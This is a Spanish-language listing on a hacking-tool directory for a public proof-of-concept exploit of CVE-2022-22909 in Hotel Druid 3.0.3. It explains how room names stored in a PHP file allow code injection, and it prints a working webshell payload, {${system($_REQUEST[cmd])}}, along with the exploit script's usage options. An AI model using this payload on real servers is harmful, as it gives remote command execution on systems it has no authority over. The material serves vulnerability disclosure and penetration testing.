Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-22909 — Hotel Druid 3.0.3 Inyección de Código a Ejecución Remota de Código | Kitploit
Herramientas/GitHubGitHub/0z09e/cve-2022-22909
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHub0z09e/cve-2022-22909

CVE-2022-22909

Hotel Druid 3.0.3 Inyección de Código a Ejecución Remota de Código

Ver Repositorio
55hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-22909

Descripción

Se ha encontrado una vulnerabilidad de inyección de código en la aplicación Hotel Druid v3.0.3, que un atacante podría explotar para ejecutar código remoto en el servidor. Para una explotación exitosa, un atacante debe tener el privilegio de agregar una nueva habitación.

Descripción de la vulnerabilidad

La vulnerabilidad ocurre porque los nombres de las habitaciones se almacenan dentro de un archivo llamado /dati/selectappartamenti.php usando comillas dobles.

root@kitploit:~
<?php 
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

Payload

Para realizar una explotación exitosa, agregue una habitación con el siguiente payload como nombre de habitación.

root@kitploit:~
{${system($_REQUEST[cmd])}}

Después de agregar una nueva habitación, vaya a /dati/selectappartamenti.php y active la webshell pasando un comando usando el parámetro cmd.

Uso

root@kitploit:~
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  -t TARGET, --target TARGET
                        Target URL. Example : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        password
  --noauth              If No authentication is required to access the dashboard

Ejemplo

Si la aplicación no tiene autenticación. Utilice la bandera --noauth para no requerir autenticación.

Si el servidor tiene autenticación habilitada, use --username y --password para realizar la autenticación.

Créditos

Investigador y escritor del PoC - 0z09e


Descargar herramienta